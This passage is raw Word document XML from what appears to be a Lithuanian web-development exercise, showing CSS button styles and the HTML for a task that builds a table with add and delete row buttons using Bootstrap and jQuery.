          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: rgba(255, 255, 255, .1);</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utton.close {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin: 0 0 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #FC6468;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w: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button.close:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border: 1px solid #FC6468;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #FC6468;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidR="00361BB7">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> DINAMIŠKĄ LENTELĘ SU GALIMYBE PRIDĖTI IR PAŠALINTI LENTELĖS EILUTES</w:t>
      </w:r>
      <w:r w:rsidR="00361BB7">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C01363" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00FD46CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">index.html </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&g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lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css" integrity="sha384-GJzZqFGwb1QTTN6wy59ffF1BuGJpLSa9DkKMp0DgiMDm4iYMj70gZWKYbI706tWS"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        crossorigin="anonymous"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;title&gt;Add/Remove Table Rows Dynamically&lt;/title&g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lt;/head&g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lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;div class="row mt-5"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">            &lt;div class="col-10 offset-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;div class="form-group"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="text" id="name" placeholder="Name"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="text" id="email" placeholder="Email Address"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;input type="button" class="add-row btn btn-info" value="Add Row"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;table class="table table-striped"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;thead class="bg-info"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Select&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Name&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;th&gt;Email&lt;/th&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/thead&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;&lt;input type="checkbox" name="record"&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;Name &lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                            &lt;td&gt;name.surname@mail.com&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                        &lt;/tr&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                    &lt;/tbody&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">                &lt;button type="button" class="delete-row btn btn-danger"&gt;Delete Row&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;/div&g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 xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pP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 xml:space="preserve">    &lt;script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA"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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js" integrity="sha384-wHAiFfRlMFy6i5SRaxvfOCifBUQy1xHdJ/yoi7FRNXMRBu5WHdZYu1hA6ZOblgut"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA"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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
